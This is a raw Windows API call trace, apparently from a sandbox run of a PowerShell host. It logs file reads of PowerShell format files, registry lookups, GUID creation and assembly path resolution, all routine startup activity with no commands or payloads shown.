	[0160.000] ReadFile (in: hFile=0x1c4, lpBuffer=0x342f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x342f4f0*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.021] ReadFile (in: hFile=0x1c4, lpBuffer=0x342f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x342f4f0*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.036] ReadFile (in: hFile=0x1c4, lpBuffer=0x342f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x342f4f0*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.057] ReadFile (in: hFile=0x1c4, lpBuffer=0x342f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x342f4f0*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.092] ReadFile (in: hFile=0x1c4, lpBuffer=0x342f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x342f4f0*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.136] ReadFile (in: hFile=0x1c4, lpBuffer=0x342f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x342f4f0*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.155] ReadFile (in: hFile=0x1c4, lpBuffer=0x342f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x342f4f0*, lpNumberOfBytesRead=0x25cdf8*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.186] ReadFile (in: hFile=0x1c4, lpBuffer=0x342ea3a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x342ea3a*, lpNumberOfBytesRead=0x25cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0160.189] ReadFile (in: hFile=0x1c4, lpBuffer=0x342f4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x342f4f0*, lpNumberOfBytesRead=0x25cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0160.195] CloseHandle (hObject=0x1c4) returned 1
	[0160.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.214] SetErrorMode (uMode=0x1) returned 0x1
	[0160.214] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25cda0 | out: lpFileInformation=0x25cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.409] SetErrorMode (uMode=0x1) returned 0x1
	[0160.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.409] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25ce88 | out: phkResult=0x25ce88*=0x1c4) returned 0x0
	[0160.409] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25ce0c, lpData=0x0, lpcbData=0x25ce08*=0x0 | out: lpType=0x25ce0c*=0x1, lpData=0x0, lpcbData=0x25ce08*=0x56) returned 0x0
	[0160.409] CoTaskMemAlloc (cb=0x5a) returned 0x4aea40
	[0160.409] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25cddc, lpData=0x4aea40, lpcbData=0x25cdd8*=0x56 | out: lpType=0x25cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25cdd8*=0x56) returned 0x0
	[0160.409] CoTaskMemFree (pv=0x4aea40) 
	[0160.409] RegCloseKey (hKey=0x1c4) returned 0x0
	[0160.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.418] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x9ae9ad20, Data2=0xe4eb, Data3=0x4708, Data4=([0]=0xb6, [1]=0xa5, [2]=0x29, [3]=0xb6, [4]=0x76, [5]=0x5f, [6]=0x83, [7]=0xbf))) returned 0x0
	[0160.435] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x27f1e2ca, Data2=0xa693, Data3=0x4af6, Data4=([0]=0xbd, [1]=0x0, [2]=0x32, [3]=0xcd, [4]=0x3d, [5]=0xb0, [6]=0x51, [7]=0x89))) returned 0x0
	[0167.721] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0xa30b3d78, Data2=0xe67b, Data3=0x47c7, Data4=([0]=0x80, [1]=0xb2, [2]=0x1c, [3]=0xe4, [4]=0xb2, [5]=0x4b, [6]=0x80, [7]=0x71))) returned 0x0
	[0167.728] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0xde998791, Data2=0x71e9, Data3=0x4e48, Data4=([0]=0xb5, [1]=0x8b, [2]=0xe5, [3]=0xeb, [4]=0x7c, [5]=0x46, [6]=0x59, [7]=0xab))) returned 0x0
	[0167.729] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x29d174cb, Data2=0xa21d, Data3=0x4d4d, Data4=([0]=0x8a, [1]=0xc5, [2]=0x6b, [3]=0xe, [4]=0x31, [5]=0xad, [6]=0x5d, [7]=0xb8))) returned 0x0
	[0167.730] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x3cac6c6d, Data2=0x4c00, Data3=0x479a, Data4=([0]=0xb6, [1]=0xae, [2]=0x85, [3]=0x5a, [4]=0x98, [5]=0xed, [6]=0xe, [7]=0x75))) returned 0x0
	[0167.731] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x5028e58e, Data2=0xcecb, Data3=0x4f3c, Data4=([0]=0x81, [1]=0x4e, [2]=0xe9, [3]=0x3c, [4]=0x48, [5]=0x82, [6]=0xd7, [7]=0xd4))) returned 0x0
	[0167.732] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x96bff054, Data2=0x73f7, Data3=0x48a6, Data4=([0]=0xb7, [1]=0x5e, [2]=0x74, [3]=0xd4, [4]=0x79, [5]=0x6, [6]=0xc9, [7]=0xb5))) returned 0x0
	[0167.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.761] SetErrorMode (uMode=0x1) returned 0x1
	[0167.764] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0167.768] GetFileType (hFile=0x1c4) returned 0x1
	[0167.769] SetErrorMode (uMode=0x1) returned 0x1
	[0167.769] GetFileType (hFile=0x1c4) returned 0x1
	[0167.773] ReadFile (in: hFile=0x1c4, lpBuffer=0x34a5db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a5db8*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0167.811] ReadFile (in: hFile=0x1c4, lpBuffer=0x34a5db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a5db8*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0167.811] ReadFile (in: hFile=0x1c4, lpBuffer=0x34a5db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a5db8*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0167.812] ReadFile (in: hFile=0x1c4, lpBuffer=0x34a5db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a5db8*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0167.813] ReadFile (in: hFile=0x1c4, lpBuffer=0x34a5db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a5db8*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0167.813] ReadFile (in: hFile=0x1c4, lpBuffer=0x34a5db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a5db8*, lpNumberOfBytesRead=0x25cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0167.813] ReadFile (in: hFile=0x1c4, lpBuffer=0x34a5db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a5db8*, lpNumberOfBytesRead=0x25cdf8*=0xaca, lpOverlapped=0x0) returned 1
	[0167.813] ReadFile (in: hFile=0x1c4, lpBuffer=0x34a53ea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a53ea*, lpNumberOfBytesRead=0x25cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0167.813] ReadFile (in: hFile=0x1c4, lpBuffer=0x34a5db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34a5db8*, lpNumberOfBytesRead=0x25cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0167.813] CloseHandle (hObject=0x1c4) returned 1
	[0167.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.814] SetErrorMode (uMode=0x1) returned 0x1
	[0167.814] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25cda0 | out: lpFileInformation=0x25cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0167.814] SetErrorMode (uMode=0x1) returned 0x1
	[0167.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.814] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25ce88 | out: phkResult=0x25ce88*=0x1c4) returned 0x0
	[0167.814] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25ce0c, lpData=0x0, lpcbData=0x25ce08*=0x0 | out: lpType=0x25ce0c*=0x1, lpData=0x0, lpcbData=0x25ce08*=0x56) returned 0x0
	[0167.814] CoTaskMemAlloc (cb=0x5a) returned 0x4ae9d0
	[0167.814] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25cddc, lpData=0x4ae9d0, lpcbData=0x25cdd8*=0x56 | out: lpType=0x25cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25cdd8*=0x56) returned 0x0
	[0167.814] CoTaskMemFree (pv=0x4ae9d0) 
	[0167.814] RegCloseKey (hKey=0x1c4) returned 0x0
	[0167.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0168.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0168.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0168.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0179.166] VirtualQuery (in: lpAddress=0x25b920, lpBuffer=0x25c7e0, dwLength=0x30 | out: lpBuffer=0x25c7e0*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.825] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0xbd176359, Data2=0x2060, Data3=0x4f2c, Data4=([0]=0x8b, [1]=0x0, [2]=0x92, [3]=0x45, [4]=0xa, [5]=0xaa, [6]=0x33, [7]=0x14))) returned 0x0
	[0179.826] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x1292ea72, Data2=0xbe05, Data3=0x4915, Data4=([0]=0x9d, [1]=0xe3, [2]=0xcc, [3]=0xe5, [4]=0xcb, [5]=0x58, [6]=0xf5, [7]=0x66))) returned 0x0
	[0179.827] VirtualQuery (in: lpAddress=0x25bad0, lpBuffer=0x25c990, dwLength=0x30 | out: lpBuffer=0x25c990*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.828] VirtualQuery (in: lpAddress=0x25bad0, lpBuffer=0x25c990, dwLength=0x30 | out: lpBuffer=0x25c990*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.829] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x50ab37d3, Data2=0x3f06, Data3=0x4f83, Data4=([0]=0xaf, [1]=0x4d, [2]=0x28, [3]=0xd8, [4]=0xd7, [5]=0x1e, [6]=0x51, [7]=0xf5))) returned 0x0
	[0179.832] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0xf4a7d0f0, Data2=0xd245, Data3=0x41c3, Data4=([0]=0xb0, [1]=0x7a, [2]=0x60, [3]=0x47, [4]=0x2e, [5]=0xa7, [6]=0x90, [7]=0xc4))) returned 0x0
	[0179.832] VirtualQuery (in: lpAddress=0x25bd20, lpBuffer=0x25cbe0, dwLength=0x30 | out: lpBuffer=0x25cbe0*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.838] VirtualQuery (in: lpAddress=0x25b390, lpBuffer=0x25c250, dwLength=0x30 | out: lpBuffer=0x25c250*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0180.479] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x9e333ac1, Data2=0x78cf, Data3=0x4dac, Data4=([0]=0x84, [1]=0x94, [2]=0x45, [3]=0x13, [4]=0xbe, [5]=0x91, [6]=0x5, [7]=0x34))) returned 0x0
	[0180.480] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0xa35d8252, Data2=0xbcc4, Data3=0x43a2, Data4=([0]=0xa1, [1]=0x42, [2]=0x49, [3]=0xaf, [4]=0x55, [5]=0xea, [6]=0x8, [7]=0xf2))) returned 0x0
	[0180.481] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x5ec8806d, Data2=0x5e91, Data3=0x4c9d, Data4=([0]=0x86, [1]=0x7c, [2]=0xe0, [3]=0xe5, [4]=0xad, [5]=0x27, [6]=0xb6, [7]=0x18))) returned 0x0
	[0180.481] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x6621ea42, Data2=0xd945, Data3=0x4516, Data4=([0]=0x9f, [1]=0x30, [2]=0xde, [3]=0xc6, [4]=0x3a, [5]=0x4, [6]=0xe1, [7]=0x45))) returned 0x0
	[0180.482] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0xb2fc1993, Data2=0x2f41, Data3=0x405e, Data4=([0]=0xb3, [1]=0xbf, [2]=0x2e, [3]=0x70, [4]=0xd, [5]=0xc3, [6]=0x28, [7]=0x7a))) returned 0x0
	[0180.482] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0xfc6f71bc, Data2=0x8922, Data3=0x4317, Data4=([0]=0xba, [1]=0x6c, [2]=0xc9, [3]=0x31, [4]=0x75, [5]=0x39, [6]=0x82, [7]=0xa5))) returned 0x0
	[0180.482] VirtualQuery (in: lpAddress=0x25ba60, lpBuffer=0x25c920, dwLength=0x30 | out: lpBuffer=0x25c920*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0180.483] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x95c3c2c1, Data2=0x4fc4, Data3=0x4ec7, Data4=([0]=0xaa, [1]=0x68, [2]=0xcf, [3]=0xff, [4]=0xfd, [5]=0x6b, [6]=0x95, [7]=0xc))) returned 0x0
	[0180.484] VirtualQuery (in: lpAddress=0x25ba60, lpBuffer=0x25c920, dwLength=0x30 | out: lpBuffer=0x25c920*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0180.485] VirtualQuery (in: lpAddress=0x25ba60, lpBuffer=0x25c920, dwLength=0x30 | out: lpBuffer=0x25c920*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0189.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.352] CoCreateGuid (in: pguid=0x25d0b0 | out: pguid=0x25d0b0*(Data1=0x96054a3b, Data2=0x4365, Data3=0x4abc, Data4=([0]=0x9f, [1]=0xaa, [2]=0x8d, [3]=0xb7, [4]=0xf2, [5]=0x6d, [6]=0xe7, [7]=0x66))) returned 0x0
	[0189.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
